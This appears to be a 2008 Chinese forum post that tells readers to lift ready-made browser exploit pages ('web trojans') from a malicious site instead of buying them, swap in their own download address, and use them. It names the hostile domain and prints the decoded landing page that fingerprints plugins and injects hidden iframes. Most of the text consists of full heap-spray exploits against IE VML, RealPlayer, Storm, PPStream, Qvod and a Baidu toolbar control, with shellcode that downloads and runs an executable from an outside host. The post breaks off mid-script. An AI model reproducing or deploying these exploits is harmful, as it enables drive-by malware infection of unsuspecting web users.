 
 
从此不再为到处找网马发愁!
发布者ID:3 作者: 发布时间:2008-05-13 01:42:50 来源: 点击:
 
从此不再为网马发愁!

友情提醒:打开别人的毒网,最好是在虚拟机或者肉鸡上面研究,以免你自己的机器中马了!
前言: 如今有很多人, 总是想着去买马. 花大几百,或者几千. 去买个破马. 其实, 现在挂马地址又多.

根本不需要买的. 随便逛个毒网. OK. 什么网马都有了. 像下面这个地址. 挂的太全了.

什么东西都有了. 你说,你还买个什么. 直接一解密, 把EXE 加密地址换成自己的就可以用了.

为什么要去买呢? 那个REALONE 的有解密工具. 但解后, 不知如何再还原. 其它的马.都是可以偷过用

的.如果,一定要用REALONE 马的话, 我以前的BLOG 中有的. 有个REALONE 马. 想用可以直接拿去!

主站地址: http://ddz.yu52323.cn/index.htm

打开后, 实用网址查询, 现在很多恶意网站, 或者, 租服务器挂毒的, 都是用网址查询. 这种最简单..

打开该网页后. 会先打开http://ddz.yu52323.cn/css.htm页面. 来加载调用网马地址.

该页面解密后:

<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
var cook = "silentwm";

// Cookie writer for the decoded landing page: stores name=value, with the value passed
// through escape(), and appends an "expires" attribute only when an expiry Date is given.
// NOTE(review): the opening brace of the function body is absent in this listing, so the
// sample is a transcription of the decoded page rather than a parseable script.
function setCookie(name, value, expire)

  // expire == null also matches undefined, so a missing argument yields a session cookie.
  window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" +

expire.toGMTString()));
}

// Cookie reader for the decoded landing page: returns the unescape()d value stored under
// Name in document.cookie, or null when no "Name=" substring is found.
// NOTE(review): the opening brace of the function body is absent in this listing.
function getCookie(Name)

  var search = Name + "=";
  if (window.document.cookie.length > 0)
  {
    // offset and end are assigned without var, so they become page-level globals.
    offset = window.document.cookie.indexOf(search);
    if (offset != -1)
    {
    offset += search.length;     
    end = window.document.cookie.indexOf(";", offset)     
    // No trailing ";" means this is the last cookie in the string.
    if (end == -1)
      end = window.document.cookie.length;
    return unescape(window.document.cookie.substring(offset, end));
    }
  }
  return null;
}

// Marks this browser as already served: writes a cookie whose name is the global `cook`
// ("silentwm" in this sample) and whose value is `name`, expiring 24 hours from now.
// Analyst note: the cookie name is a stable host-side indicator that the landing page ran.
function register(name)
{
  var today = new Date();
  var expires = new Date();
  // 1000*60*60*24 ms = one day.
  expires.setTime(today.getTime() + 1000*60*60*24);
  setCookie(cook, name, expires);
}

// Dispatcher of the decoded landing page (css.htm). Read from a defender's side:
//  - Once-per-day gate: if the cookie named by `cook` is present the function returns
//    immediately; otherwise register() sets it. A second fetch from the same browser
//    profile therefore shows no exploit content, so sandbox replays need a clean cookie store.
//  - Plugin probing: each try block attempts to instantiate one ActiveX control, and the
//    paired finally block conditionally document.write()s an iframe pointing under ../imgs/.
//  - All iframes are zero-height or display:none; hidden iframes written after ActiveX
//    probing are the main content-inspection indicator in this page.
// NOTE(review): the tests compare the catch variable with "[object Error]" outside the
// catch block, which presumably depends on legacy JScript scoping of catch identifiers.
// Confirm against the engine used for emulation, since other engines may take different
// branches than the original target browser did.
function openWM()
{
  var c = getCookie(cook);
  if (c != null)
  {
  // Already served within the cookie lifetime: do nothing.
  return;
  }
 
  register(cook);
 
  // Status bar text "完成" ("Done") makes the page look as if it has finished loading.
  window.defaultStatus="完成";
 
  // First probe: object with a fixed classid, then createobject("Adodb.Stream").
  // NOTE(review): this CLSID is commonly associated with the RDS.DataSpace control; confirm.
  try{ var e;
    var ado=(document.createElement("object"));
    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")}
  catch(e){};
  finally{
    if(e!="[object Error]"){
    document.write("<iframe width=50 height=0 src=../imgs/14.htm></iframe>")}
    else
    {
    // Remaining probes run only in this else branch. Each ProgID below identifies a
    // third-party browser plugin; the ProgID split with "+" is string-level obfuscation
    // against naive signature matching.
    try{ var j;
      var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
    catch(j){};
    finally{if(j!="[object Error]"){
      document.write('<iframe width=10 height=0 src=../imgs/new.htm></iframe>')}}

    try{ var g;
      var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
    catch(g){};
    finally{if(g!="[object Error]"){
      document.write('<iframe style=display:none src=../imgs/lz.htm></iframe>')}}
   
    try{ var h;
      var storm=new ActiveXObject("MPS.StormPlayer.1");}
    catch(h){};
    finally{if(h!="[object Error]"){
      document.write('<iframe style=display:none src=../imgs/bf.htm></iframe>')}}

    try{ var p;
      var qvod=new ActiveXObject("QvodInsert.QvodCtrl.1");}
    catch(p){};
    finally{if(p!="[object Error]"){
      document.write('<iframe width=10 height=0 src=../imgs/qq.htm></iframe>')}}

    try{ var f;
      var thunder=new ActiveXObject("DPClient.Vod");}
    catch(f){};
    finally{ if(f!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/xl.htm></iframe>')}}
                              try{ var c;
                                        var Baidu=new ActiveXObject("BaiduBar.Tool.1");}
          catch(c){};
    finally{ if(c!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/Baidu.htm></iframe>')}}
                              try{ var m;
                                        var Real10=new ActiveXObject("IERPCtl.IERPCtl.1");}
          catch(m){};
    finally{ if(m!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/rl.htm></iframe>')}}
                               

    // 04.htm is written without any plugin check inside this branch.
    document.write('<iframe style=display:none src=../imgs/04.htm></iframe>')

    // When every probe reported an error the visitor is sent to a blank page, which
    // leaves little on screen for a user or a casual analyst to notice.
    if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]" && p=="[object Error]" && c=="[object Error]" && m=="[object Error]")
    {location.replace("about:blank");}
    }}
}

openWM();
</script>

挂的东西, 还是满齐全的. 世面上有的马, 他这里全有了. 想偷马的. 就趁现在哈!!

http://ddz.yu52323.cn/imgs/04.htm
http://ddz.yu52323.cn//imgs/Baidu.htm
http://ddz.yu52323.cn//imgs/bf.htm
http://ddz.yu52323.cn//imgs/lz.htm
http://ddz.yu52323.cn//imgs/new.htm
http://ddz.yu52323.cn//imgs/qq.htm
http://ddz.yu52323.cn//imgs/rl.htm
http://ddz.yu52323.cn//imgs/xl.htm
http://ddz.yu52323.cn//imgs/14.htm

先看看04.HTM 吧! 这个是07004 漏洞马! 想要的可以直接拿去!

<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="Silent" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:*{behavior:url(#Silent);}
</style>
<SCRIPT language="javascript">
var shellcode;
var x74s0= "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
</script>
<script>
shellcode = "%u9090%u9090"+
"%u9090"+"%u6090%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+"%uffff%ua164%u0030%u0000%u408b"+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+"%u6856%u4e8e%uec0e%ua3e8%u0000"+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+"%u8900%u1445%ue0bb%u020f%u8900"+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+"%u0544%u652c%u0000%u5600%u8d56"+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+"%u0320%u33f3%u49c9%uad41%uc303"+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+"%u5e00%u80bf%u020c%ub900%u0100"+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+"%u0c47%u6165%u0070%u5057%u55ff"+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+"%u1055%u06c7%u0c80%u0002%uc481"+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+x74s0;

var sh=unescape(shellcode);

sz=sh.length*2;
npsz=0x1000000-(sz+0x38);
nps=unescape("%u0c0c%u0c0c");
while(nps.length*2*1<npsz)
nps+=nps;
ihbc=(0x09000000-0x1000000)/0x1000000;
Silent_arry=new Array();
for(x=0;x<ihbc;x++)
{
Silent_arry[x]=nps+sh;
}
</script>
</head>
<BODY onload=window.status="">
<v:rect style="width:0pt;height:0pt" fillcolor="white" >
<v:recolorinfo recolorstate="t" numcolors="97612895">
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v/recolorinfo>
</body>
</html>

baidu.htm

<script>window.onerror=function(){return true;}</script><OBJECT ID = "com" style='display:none' CLASSID = "clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9E9}"></OBJECT><script>dddddddassadddddddddddddfdsfsf = "ddddsadadsddasfdsdddddddfasdfasfasf";com["DloadDS"]("http://hah.kdi23.cn/Baidu.cab", "Baidu.exe", 0);</script>

BF.htm

<html>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='Silent'></object>
<body>
<script>
var bf0 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var bf1 = "%u9090%u9090";

var shellcode = unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041" + bf0);
</script>
<SCRIPT language="javascript">
var bigblock = unescape(bf1);
var headersize = 20;
var slackspace = headersize+0+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a\x0a\x0a\x0a';
var Silent1 = Silent;
Silent1.rawParse(buffer);
</script>
</body>
</html>

LZ.htm

<html>
<body>
<title>Silent</title>
<SCRIPT language="javascript">
var pps="clsid:61F5C358-60FB-4A23";
var pplive="-A312-D2B556620F20";
var baofeng=pps+pplive;
paopaopao=document.createElement("object");
paopaopao["setAttribute"]("classid", baofeng);
</script>
<SCRIPT language="javascript">
var pao7="%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845";
var pao25="%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500";
var url="%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var pao10="%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff";
var pao28="%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e";
var pao4="%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98";
var pao21="%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700";
var pao29="%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff";
var pao17="%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000";
var pao1="%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9";
var pao13="%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b";
</script>
<SCRIPT language="javascript">
var pao2="%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c";
var pao3="%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503";
var pao5="%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900";
var pao6="%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946";
var pao8="%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303";
var pao9="%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455";
var pao11="%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d";
var pao12="%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200";
var pao14="%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356";
var pao15="%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5";
var pao16="%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5";
var pao18="%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447";
var pao19="%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c";
var pao20="%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08";
var pao22="%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb";
var pao23="%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100";
var pao24="%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00";
var pao26="%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318";
var pao27="%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000";
var paopao1=pao1+pao2+pao3+pao4+pao5+pao6+pao7+pao8+pao9+pao10+pao11+pao12+pao13;
var paopao2=pao14+pao15+pao16+pao17+pao18+pao19+pao20+pao21+pao22+pao23+pao24;
var paopao3="%u9090%u9090"+paopao1+paopao2+pao25+pao26+pao27+pao28+pao29;
</script>
<script language="JavaScript">
var webshell = window["unescape"](paopao3+url);
var bigblock = unescape("%u90"+"90"+"%u90"+"90");
var headersize = 20;
var slackspace = headersize+webshell.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock["substring"](0, bigblock["length"]-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var chilam_user;
pps = new Array();
var pplive=pps;
for (x=0; x<300; x++) pplive[x] = block + webshell;
var buffer = '';
while (buffer["length"] < 1319) buffer+="A";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
paopaopao["hgs_startNotify"](buffer);
</script>
</body>
</html>

new.htm  这个是REALONE 的!

<html><body>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="Silent"></object>
<script>
var shellcode;
var real110 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var real111 = "%u9090%u9090";
var real112 = "%u0C0C%u0C0C";
</script><script>
shellcode = "";
shellcode = real111+
"%u9090"+"%u6090%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+"%uffff%ua164%u0030%u0000%u408b"+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+"%u6856%u4e8e%uec0e%ua3e8%u0000"+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+"%u8900%u1445%ue0bb%u020f%u8900"+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+"%u0544%u652c%u0000%u5600%u8d56"+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+"%u0320%u33f3%u49c9%uad41%uc303"+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+"%u5e00%u80bf%u020c%ub900%u0100"+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+"%u0c47%u6165%u0070%u5057%u55ff"+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+"%u1055%u06c7%u0c80%u0002%uc481"+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+real110;

var shellcode1 = unescape(shellcode);

var bigblock = unescape(real112);
var headersize = 20;
var slackspace = headersize + shellcode1.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 400; i++){ memory = block + shellcode1 }
var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");
var m = '';
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
</script>
</body></html>

qq.htm      这个为qvod 播放器马

<HTML><BODY>
<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" name="Silent" width=100 height=200></object>

<script>
var qvod0 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var qvod1 = "%u56f5%u768b";
</script>

<script>
var shellshell = "%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378" + qvod1 + "%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224" +"%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff" + qvod0 ;
</script>

<script>
var heapSprayToAddress = 0x05050505;
var shellcode = unescape(shellshell);
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var uun = "%u0505%u0505"
var spraySlide = unescape(uun);
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
try
{
var a=new Array(813);
var b=new Array(227);
a=a+"aaaa";
a=a+b+"a0 wa0 wa0 wa0 wa0 wa0 wa0 wa0 wjjjjjjjjjjjjjjjjjjN8 wvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccN";
a=a+"N8 wV8d JkIkBBs(ss&hsFFRECCvPAQdsezxCDDf%4ss#";

Silent.URL=a;
}
catch(e){}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2/1);
return spraySlide;
}
</script>
</BODY></HTML>

rl.htm    REALONE

<script>
var pao1="LLLL\\XXXXXLD";
var pao2=pao1;
var pao3="c:\\Program Files\\NetMeeti";
var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";
var pao5="s.wav";
var pao6=pao3+pao4+pao5;
var pao7="c:\\Program Files\\Ne";
var pao8="tMeeting\\TestSn";
var pao9="d.wav";
var pao0=pao7+pao8+pao9;
var pps1="C:\\WINDOWS\\system32";
var pps2="\\BuzzingBee.wav";
var pps3=pps1+pps2;
var pps4="C:\\WINDOWS\\clock.avi";
var pps5="c:\\Program Files\\NetMeeting";
var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";
var pps7=pps5+pps6;
var pps8="C:\\WINDOWS\\syste";
var pps9="m32\\LoopyMusic.wav";
var pps0=pps8+pps9;
var sel1="IERPCtl.I";
var sel2="ERPCtl.1";
var sel3=sel1+sel2;
var x1="%75"+"%06"+"%74"+"%04";
var x2="%7f"+"%a5"+"%60";
var x3="%4f"+"%71"+"%a4"+"%60";
var x4="%63"+"%11"+"%08"+"%60";
var x5="%63"+"%11"+"%04"+"%60";
var x6="%79"+"%31"+"%01"+"%60";
var x7="%79"+"%31"+"%09"+"%60";
var x8="%51"+"%11"+"%70"+"%63";
var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];
function RealExploit()
{
var user=navigator.userAgent["toLowerCase"]();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;
if(user.indexOf("nt 5.")==-1) return;

creobj=sel3;

try{ Realpao = new window["ActiveXObject"](creobj); }
catch(error){ return; }

RealVersion = Realpao.PlayerProperty("PRODUCTVERSION");

var reading="";
var tiaozhuan=unescape(pplive[0]);
var fanhui;

for(i=0;i<32*148;i++)
  reading+="S";

if(RealVersion.indexOf("6.0.14.")==-1)
{
  if(navigator.userLanguage.toLowerCase()=="zh-cn") fanhui=unescape(pplive[1]);
  else if(navigator.userLanguage.toLowerCase()=="en-us") fanhui=unescape(pplive[2]);
  else return;
}
else if(RealVersion=="6.0.14.544") fanhui=unescape(pplive[3]);
else if(RealVersion=="6.0.14.550") fanhui=unescape(pplive[4]);
else if(RealVersion=="6.0.14.552") fanhui=unescape(pplive[5]);
else if(RealVersion=="6.0.14.543") fanhui=unescape(pplive[6]);
else if(RealVersion=="6.0.14.536") fanhui=unescape(pplive[7]);
else return;

if(RealVersion.indexOf("6.0.10.")!=-1)
{
  for(i=0;i<4;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
  for(i=0;i<6;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
  for(i=0;i<9;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
  for(i=0;i<10;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
